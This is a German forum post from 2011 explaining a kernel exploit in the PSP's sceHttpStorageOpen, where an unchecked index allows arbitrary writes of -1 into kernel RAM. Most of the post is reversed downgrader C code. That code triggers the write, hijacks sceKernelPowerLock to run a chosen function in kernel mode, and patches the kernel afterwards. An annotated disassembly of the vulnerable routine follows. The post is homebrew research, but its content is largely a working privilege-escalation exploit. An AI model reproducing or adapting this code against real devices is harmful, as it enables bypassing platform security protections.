HacKmaN
RE: Firmware 6.39 veröffentlicht!
Es war kein VSH-Exploit, sondern ein Kernel-Exploit in sceHttpStorageOpen: Der Index-Parameter wird dort nicht auf seinen Bereich geprüft, sodass man an beliebige wortausgerichtete Adressen im Kernel-RAM den Wert -1 schreiben konnte...
Reversed aus dem Downgrader (basierend auf Davees Downgrader; man erkennt sofort, dass lediglich der neue Kernel-Exploit (Ksploit) eingesetzt wurde):
/*
 * Function-pointer globals of the downgrader.  sceHttpStorageOpen is the
 * vulnerable user-side export and is resolved by doKernelExploit638(); the
 * pspKernel.../pspIo... pointers are filled in by pre_kernel() once it runs
 * in kernel mode.  Every pointer stays NULL until it has been resolved, so
 * anything that uses them must check first.  The trailing "// 0x000xxxxx"
 * values come from the original listing and are presumably the offsets of
 * these globals in the reversed downgrader image.
 */
int (* sceHttpStorageOpen) (int a0, int a1, int a2); // 0x0001600C -- NID 0x700AAD44, see the listing below; (index, flags, mode)
int (* pspKernelGetModel)(void) = NULL; // 0x00010B60 -- SysMemForKernel NID 0x458A70B5
SceModule *(* pspKernelFindModuleByName)(const char *name) = NULL; // 0x00010B64 -- found by prologue signature scan, not by NID
int (* pspKernelLoadExecVSHEf1)(const char *path, struct SceKernelLoadExecVSHParam *param) = NULL; // 0x00010B68 -- LoadExecForKernel NID 0xCEFE1100
int (* pspKernelLoadExecVSHMs1)(const char *path, struct SceKernelLoadExecVSHParam *param) = NULL; // 0x00010B6C -- LoadExecForKernel NID 0x7286CF0B
SceUID (* pspIoOpen)(char *file, int flags, SceMode mode) = NULL; // 0x00010B70 -- IoFileMgrForKernel NID 0x109F50BC (the open call in the listing)
int (* pspIoWrite)(SceUID fd, void *data, u32 len) = NULL; //0x00010B74 -- IoFileMgrForKernel NID 0x42EC03AC
int (* pspIoClose)(SceUID fd) = NULL; // 0x00010B78 -- IoFileMgrForKernel NID 0x810C4BC3 (the close call in the listing)
u32 g_kfunctions_resolved = 0; // 0x00010B5C -- set by pre_kernel() once the table above has been filled
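/* sub_00000E1C */
/*
 * Kernel-mode trampoline.  execKernelFunction631/635_8 arrange for the
 * kernel to call this function (via the corrupted sceKernelPowerLock path)
 * with kfunc as its argument.  It resolves the kernel functions the
 * downgrader needs, flushes the caches and then runs kfunc.
 *
 * kfunc:   function to execute in kernel mode, called with no arguments.
 * returns: whatever kfunc returns.
 *
 * The resolved addresses are cached in the pspKernel... / pspIo... globals.
 * g_kfunctions_resolved is only set once every lookup succeeded, so a
 * partial failure is retried on the next call.  A lookup that fails leaves
 * its global NULL; kfuncs that use these pointers must check for that,
 * because calling NULL in kernel mode takes the console down.  The
 * original listing also used the loop index without declaring it.
 */
int pre_kernel(int (* kfunc)(void))
{
    /* Clear $k1 so the SDK/kernel calls made from here are presumably not
     * rejected as coming from a user-mode thread (pspSdkSetK1 is an SDK
     * helper, not shown here). */
    pspSdkSetK1(0);

    if(!g_kfunctions_resolved)
    {
        u32 i;
        int complete = 1;

        /* Signature scan over kernel RAM (0x88000000..0x883FFFFF) for a
         * function prologue:
         *   addiu $sp,$sp,-32 / sw $s4,16($sp) / sw $s3,12($sp) /
         *   sw $s2,8($sp) / move $s2,$zero / move $s3,$s2
         * with "slt $a0,$s3,$v1" at +0x54.  The loop bound keeps i+0x54
         * inside the 4 MB region.  The signature is assumed to be unique to
         * sceKernelFindModuleByName in the 6.3x kernels -- TODO confirm on
         * every firmware the downgrader supports. */
        pspKernelFindModuleByName = NULL;
        for(i = 0x88000000; i < 0x883FFFA8; i += 4)
        {
            if(_lw(i + 0x00) == 0x27BDFFE0 && _lw(i + 0x04) == 0xAFB40010 &&
               _lw(i + 0x08) == 0xAFB3000C && _lw(i + 0x0C) == 0xAFB20008 &&
               _lw(i + 0x10) == 0x00009021 && _lw(i + 0x14) == 0x02409821 &&
               _lw(i + 0x54) == 0x0263202A)
            {
                pspKernelFindModuleByName = (void *)i;
                break;
            }
        }
        if(pspKernelFindModuleByName == NULL)
        {
            complete = 0;
        }

        /* NID lookups in named kernel libraries.  FindProc is defined
         * elsewhere in the downgrader and is assumed to return NULL when a
         * NID is not exported. */
        pspKernelGetModel = (void *)FindProc("sceSystemMemoryManager", "SysMemForKernel", 0x458A70B5);
        pspKernelLoadExecVSHEf1 = (void *)FindProc("sceLoadExec", "LoadExecForKernel", 0xCEFE1100);
        pspKernelLoadExecVSHMs1 = (void *)FindProc("sceLoadExec", "LoadExecForKernel", 0x7286CF0B);
        pspIoOpen = (void *)FindProc("sceIOFileManager", "IoFileMgrForKernel", 0x109F50BC);
        pspIoWrite = (void *)FindProc("sceIOFileManager", "IoFileMgrForKernel", 0x42EC03AC);
        pspIoClose = (void *)FindProc("sceIOFileManager", "IoFileMgrForKernel", 0x810C4BC3);
        if(pspKernelGetModel == NULL || pspKernelLoadExecVSHEf1 == NULL ||
           pspKernelLoadExecVSHMs1 == NULL || pspIoOpen == NULL ||
           pspIoWrite == NULL || pspIoClose == NULL)
        {
            complete = 0;
        }

        g_kfunctions_resolved = complete;
    }

    /* Flush the caches before jumping into kfunc so the pointers written
     * above (and any code kfunc relies on) are seen coherently.  ClearCaches
     * is defined elsewhere in the downgrader. */
    ClearCaches();
    return kfunc();
}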
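/* loc_00000B90 / sub_00000924 */
/*
 * Shared body of execKernelFunction631 and execKernelFunction635_8.  The two
 * originals were identical apart from one offset (and the 6.35/6.38 one had
 * a stray comma where a semicolon belongs).
 *
 * After doKernelExploit... has written -1 into the right kernel word,
 * sceKernelPowerLock no longer behaves normally.  Reading the original code,
 * the kernel presumably dereferences the second argument at a firmware-
 * specific offset, follows the pointer it finds there 16 bytes further on,
 * and calls that address in kernel mode with the first argument in $a0:
 *
 *   arg2 + ptr_offset   -> kernel_exec_ptr  (== &kernel_exec_func - 16)
 *   kernel_exec_ptr + 16 -> kernel_exec_func (== pre_kernel | 0x80000000)
 *
 * so pre_kernel(kfunc) ends up running in kernel mode.  The exact
 * dereference pattern inside the 6.3x kernel is not visible here -- TODO
 * confirm.  Bit 31 is set on both addresses, presumably to put them in the
 * kernel-mode view of user memory.  The locals are volatile so the compiler
 * cannot drop or reorder the stores the kernel reads during the call.
 *
 * kfunc:      function to run in kernel mode (handed to pre_kernel).
 * ptr_offset: firmware-specific offset (0x4230 on 6.31, 0x40F0 on
 *             6.35/6.38).  Using the wrong one crashes the console.
 * returns:    sceKernelPowerLock's return value, which on the exploited
 *             path is what pre_kernel/kfunc returned.
 */
static int exec_kernel_function_via_powerlock(void *kfunc, u32 ptr_offset)
{
    volatile u32 kernel_exec_func = ((u32)pre_kernel) | 0x80000000;
    volatile u32 kernel_exec_ptr = ((u32)&kernel_exec_func) - 16;
    int res;

    res = sceKernelPowerLock((void *)((u32)kfunc | 0x80000000),
                             ((u32)&kernel_exec_ptr) - ptr_offset);
    /* Flush I/D caches after coming back from kernel mode (ClearCaches is
     * defined elsewhere in the downgrader). */
    ClearCaches();
    return res;
}

/* loc_00000B90 */
/* Run kfunc in kernel mode on firmware 6.31 (offset 0x4230). */
int execKernelFunction631(void *kfunc)
{
    return exec_kernel_function_via_powerlock(kfunc, 0x4230);
}

/* sub_00000924 */
/* Run kfunc in kernel mode on firmware 6.35 / 6.38 (offset 0x40F0). */
int execKernelFunction635_8(void *kfunc)
{
    return exec_kernel_function_via_powerlock(kfunc, 0x40F0);
}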
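/* sub_00000D8C */
/*
 * Dispatch kfunc to the kernel-execution variant for the running firmware.
 *
 * kfunc:   function to run in kernel mode.
 * returns: the variant's result, or 0 on an unsupported firmware, in which
 *          case kfunc is NOT executed (the hard-coded offsets of the
 *          variants would be wrong there).  Note that 0 is also a possible
 *          success value, so callers cannot tell the two apart from the
 *          return value alone.
 *
 * The original listing called "ececKernelFunction635_8" (typo) and compared
 * against 0x60300510 / 0x60300810, which cannot be right for the
 * sceKernelDevkitVersion encoding that the 6.31 value on the same lines
 * uses (0x06030110); 6.35 and 6.38 follow the same pattern as 0x06030510
 * and 0x06030810 -- TODO verify against the downgrader binary.
 */
int execKernelFunction(void *kfunc)
{
    int version = sceKernelDevkitVersion();

    switch(version)
    {
    case 0x06030110: /* 6.31 */
        return execKernelFunction631(kfunc);
    case 0x06030510: /* 6.35 */
    case 0x06030810: /* 6.38 */
        return execKernelFunction635_8(kfunc);
    default:
        return 0;
    }
}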
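/* loc_000007E8 */
/*
 * Undo the second sceHttpStorageOpen write made by doKernelExploit638.
 * 0x8800CC34 equals 0x2200330D << 2 in 32-bit arithmetic, i.e. the index
 * that call passes, so this is presumably the kernel word that was set to
 * -1; it is put back to 0, which is assumed to be its original content --
 * TODO confirm.  Runs in kernel mode via execKernelFunction635_8 and is
 * specific to firmware 6.38.
 *
 * The original listing had "return 0;" in this void function.  The store
 * goes through a volatile pointer so it cannot be elided.
 */
void repairKernel638(void)
{
    *(volatile u32 *)0x8800CC34 = 0;
}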
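/*
 * Kernel exploit for firmware 6.38, driven from user mode.
 *
 * sceHttpStorageOpen(index, flags, mode) (NID 0x700AAD44, see the listing
 * below) keeps a small descriptor table in module data but only range-tests
 * `index` (unsigned, < 2) to select the open path.  Every other index,
 * negative ones included, reaches the close path: the word at
 * table[index] is read, passed to sceIoClose and -- if it was non-negative
 * -- overwritten with -1.  That is a caller-chosen write of -1 to a
 * word-aligned kernel address.
 *
 * This routine triggers that write twice and then runs repairKernel638 in
 * kernel mode to restore the clobbered word.  The indexes, the repair
 * address and the offsets used by execKernelFunction635_8 are all specific
 * to 6.38; on another firmware the writes land on unrelated kernel words,
 * which is a crash at best.  Hence the version guard up front.
 *
 * Side effects: loads net modules 1..6 for the duration of the exploit and
 * unloads them again; leaves sceHttpStorageOpen resolved.
 *
 * Fixes against the original listing: the stub was assigned to `stub` but
 * read through an undeclared `addr`; lookup results were not checked; and
 * the teardown called sceUtilityLoadNetModule a second time in reverse
 * order, which cannot be what was meant for already-loaded modules.
 */
void doKernelExploit638(void)
{
    int module;
    SceLibraryStubTable *stub;

    /* 6.38 in sceKernelDevkitVersion's encoding (6.31 is 0x06030110 in
     * execKernelFunction; 6.38 follows the same pattern -- TODO verify on a
     * real 6.38 console). */
    if(sceKernelDevkitVersion() != 0x06030810)
    {
        return;
    }

    /* Load net modules 1..6 (PSP_NET_MODULE_COMMON .. PSP_NET_MODULE_HTTP in
     * the SDK numbering); module 6 is the HTTP stack, presumably what makes
     * the sceHttpStorage stub appear in the user-side image. */
    for(module = 1; module <= 6; module++)
    {
        sceUtilityLoadNetModule(module);
    }

    /* Locate the sceHttpStorage stub table in user memory (search starts at
     * 0x08800000) and pull sceHttpStorageOpen out of it by NID.
     * findLibraryByName / getFunctionFromLibrary are defined elsewhere in
     * the downgrader and are assumed to return NULL on failure. */
    stub = findLibraryByName("sceHttpStorage", 0x08800000);
    if(stub != NULL)
    {
        sceHttpStorageOpen = (void *)getFunctionFromLibrary(stub, 0x700AAD44);
    }

    if(stub != NULL && sceHttpStorageOpen != NULL)
    {
        /* First write: index -612 is -0x990/4, i.e. the word 0x990 bytes
         * below the descriptor table.  Why it is needed is not visible
         * here; the 1 s pause (0xF4240 us) is presumably to let the
         * sceIoClose side effect settle. */
        sceHttpStorageOpen(-612, 0, 0);
        sceKernelDelayThread(0xF4240);
        ClearCaches();

        /* Second write: 0x2200330D << 2 == 0x8800CC34 (32-bit), the word
         * repairKernel638 zeroes afterwards; how the table base in the
         * listing factors into the final address is not visible here.
         * After this the sceKernelPowerLock path used by
         * execKernelFunction635_8 runs pre_kernel -> kfunc in kernel mode. */
        sceHttpStorageOpen(0x2200330D, 0, 0);
        ClearCaches();

        execKernelFunction635_8(repairKernel638);
    }

    /* Symmetric teardown of the modules loaded above. */
    for(module = 6; module >= 1; module--)
    {
        sceUtilityUnloadNetModule(module);
    }
}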
sceHttpStorageOpen in Assembler-Form; die Stelle, an der das Ksploit sitzt (der ungeprüfte Schreibzugriff bei 0x78), ist markiert:
; ======================================================
; Subroutine sceHttpStorage_driver_700AAD44 - Address 0x00000000 - Aliases: sceHttpStorage_700AAD44
; Exported in sceHttpStorage_driver
; Exported in sceHttpStorage
;
; Reviewer notes: sceHttpStorageOpen(index, flags, mode).  $s3/$s4 hold the
; base of a small descriptor table in module data (the "lui $s3, 0x0" /
; "addiu ..., $s3, 0" pair is presumably an unresolved relocation).  Only
; index 0 and 1 have an open path (fixed paths at module offsets 0x9AC and
; 0x990).  The test at 0x08 is unsigned, so every other index -- negative
; ones included -- goes straight to loc_0000005C, where table[index] is read,
; handed to sceIoClose and, if it was non-negative, overwritten with -1.  No
; bound is ever applied to the index, so the caller chooses the target word
; (base + index*4, mod 2^32): an arbitrary write of -1 into kernel RAM, plus
; a sceIoClose on whatever value was stored there.
sceHttpStorage_driver_700AAD44:
0x00000000: 0x27BDFFE0 '...'' - addiu $sp, $sp, -32
0x00000004: 0x3C028000 '...<' - lui $v0, 0x8000
0x00000008: 0x2C830002 '...,' - sltiu $v1, $a0, 2 ; v1 = (unsigned)index < 2 -- the only test the index ever gets
0x0000000C: 0xAFB3000C '....' - sw $s3, 12($sp)
0x00000010: 0x3C130000 '...<' - lui $s3, 0x0 ; table base, hi16 (presumably relocated)
0x00000014: 0xAFB20008 '....' - sw $s2, 8($sp)
0x00000018: 0x03609021 '!.`.' - move $s2, $k1 ; save the caller's $k1
0x0000001C: 0x001BDAC0 '....' - sll $k1, $k1, 11 ; shifted $k1: the sceIo calls below are presumably accepted as kernel-mode callers
0x00000020: 0xAFB10004 '....' - sw $s1, 4($sp)
0x00000024: 0x00048880 '....' - sll $s1, $a0, 2 ; $s1 = index * 4, no range check
0x00000028: 0xAFB00000 '....' - sw $s0, 0($sp)
0x0000002C: 0x34500100 '..P4' - ori $s0, $v0, 0x100 ; $s0 = 0x80000100, default status
0x00000030: 0xAFBF0014 '....' - sw $ra, 20($sp)
0x00000034: 0x10600009 '..`.' - beqz $v1, loc_0000005C ; index >= 2 (unsigned): skip the open logic entirely
0x00000038: 0xAFB40010 '....' - sw $s4, 16($sp)
0x0000003C: 0x266A0000 '..j&' - addiu $t2, $s3, 0 ; table base
0x00000040: 0x022A4821 '!H*.' - addu $t1, $s1, $t2
0x00000044: 0x8D280000 '..(.' - lw $t0, 0($t1) ; $t0 = table[index], index is 0 or 1 here
0x00000048: 0x3C038000 '...<' - lui $v1, 0x8000
0x0000004C: 0x2407FFFF '...$' - li $a3, -1
0x00000050: 0x0220A021 '!. .' - move $s4, $s1
0x00000054: 0x11070014 '....' - beq $t0, $a3, loc_000000A8 ; entry == -1 (not open): go open the file
0x00000058: 0x34700020 ' .p4' - ori $s0, $v1, 0x20 ; delay slot: $s0 = 0x80000020, the status returned when the entry was already open
loc_0000005C: ; Refs: 0x00000034 0x000000D4
0x0000005C: 0x26740000 '..t&' - addiu $s4, $s3, 0 ; table base
0x00000060: 0x02348821 '!.4.' - addu $s1, $s1, $s4 ; $s1 = base + index*4 -- index still unchecked on the path from 0x34
0x00000064: 0x8E240000 '..$.' - lw $a0, 0($s1) ; $a0 = old entry, becomes the sceIoClose argument
0x00000068: 0x04820005 '....' - bltzl $a0, loc_00000080 ; negative entry: skip close and write (branch-likely, $k1 restored in the slot)
0x0000006C: 0x0240D821 '!.@.' - move $k1, $s2
0x00000070: 0x0C0001B3 '....' - jal IoFileMgrForKernel_810C4BC3 ; sceIoClose (NID 0x810C4BC3, cf. pspIoClose above) on whatever the word held
0x00000074: 0x2413FFFF '...$' - li $s3, -1
0x00000078: 0xAE330000 '..3.' - sw $s3, 0($s1) ; the exploit: table[index] = -1
; $s1 is derived from $a0 and is never range-checked against $k1 or anything
; else, so a caller can overwrite any word-aligned location in kernel RAM
; with -1.
0x0000007C: 0x0240D821 '!.@.' - move $k1, $s2 ; restore $k1
loc_00000080: ; Refs: 0x00000068
0x00000080: 0x02001821 '!...' - move $v1, $s0 ; return status in $s0
loc_00000084: ; Refs: 0x000000E8
0x00000084: 0x8FBF0014 '....' - lw $ra, 20($sp)
0x00000088: 0x8FB40010 '....' - lw $s4, 16($sp)
0x0000008C: 0x8FB3000C '....' - lw $s3, 12($sp)
0x00000090: 0x8FB20008 '....' - lw $s2, 8($sp)
0x00000094: 0x8FB10004 '....' - lw $s1, 4($sp)
0x00000098: 0x8FB00000 '....' - lw $s0, 0($sp)
0x0000009C: 0x00601021 '!.`.' - move $v0, $v1
0x000000A0: 0x03E00008 '....' - jr $ra
0x000000A4: 0x27BD0020 ' ..'' - addiu $sp, $sp, 32
loc_000000A8: ; Refs: 0x00000054
; open path, index is 0 or 1 and the entry is -1
0x000000A8: 0x3C0E0200 '...<' - lui $t6, 0x200
0x000000AC: 0x35CD0603 '...5' - ori $t5, $t6, 0x603
0x000000B0: 0x00AD5824 '$X..' - and $t3, $a1, $t5
0x000000B4: 0x3C0C0400 '...<' - lui $t4, 0x400
0x000000B8: 0x016C2825 '%(l.' - or $a1, $t3, $t4 ; flags = (flags & 0x02000603) | 0x04000000
0x000000BC: 0x10800012 '....' - beqz $a0, loc_00000108 ; index 0
0x000000C0: 0x30C601A4 '...0' - andi $a2, $a2, 0x1A4 ; mode &= 0x1A4 (== 0644)
0x000000C4: 0x240F0001 '...$' - li $t7, 1
0x000000C8: 0x108F0009 '....' - beq $a0, $t7, loc_000000F0 ; index 1
0x000000CC: 0x3C048000 '...<' - lui $a0, 0x8000
0x000000D0: 0x34900100 '...4' - ori $s0, $a0, 0x100
loc_000000D4: ; Refs: 0x00000100
0x000000D4: 0x0600FFE1 '....' - bltz $s0, loc_0000005C ; sceIoOpen failed (negative): table[index] is still -1, so loc_5C returns $s0
0x000000D8: 0x00001821 '!...' - move $v1, $zr ; delay slot, always executed: $v1 = 0 for the success path
0x000000DC: 0x26660000 '..f&' - addiu $a2, $s3, 0 ; table base
0x000000E0: 0x02862821 '!(..' - addu $a1, $s4, $a2 ; &table[index]
0x000000E4: 0x0240D821 '!.@.' - move $k1, $s2 ; restore $k1
0x000000E8: 0x08000021 '!...' - j loc_00000084
0x000000EC: 0xACB00000 '....' - sw $s0, 0($a1) ; table[index] = new fd, return 0
loc_000000F0: ; Refs: 0x000000C8
0x000000F0: 0x3C180000 '...<' - lui $t8, 0x0
0x000000F4: 0x27040990 '...'' - addiu $a0, $t8, 2448 ; index 1: path string at module offset 0x990
loc_000000F8: ; Refs: 0x0000010C
0x000000F8: 0x0C0001AB '....' - jal IoFileMgrForKernel_109F50BC ; sceIoOpen (NID 0x109F50BC, cf. pspIoOpen above)
0x000000FC: 0x00000000 '....' - nop
0x00000100: 0x08000035 '5...' - j loc_000000D4
0x00000104: 0x00408021 '!.@.' - move $s0, $v0 ; $s0 = fd or error
loc_00000108: ; Refs: 0x000000BC
0x00000108: 0x3C100000 '...<' - lui $s0, 0x0
0x0000010C: 0x0800003E '>...' - j loc_000000F8
0x00000110: 0x260409AC '...&' - addiu $a0, $s0, 2476 ; index 0: path string at module offset 0x9AC
//EDIT: Wo "&" steht, sollte normalerweise & stehen... kA warum das hier nicht klappt.
mfg
Dieser Beitrag wurde zuletzt bearbeitet: 24.05.2011 14:36 von HacKmaN.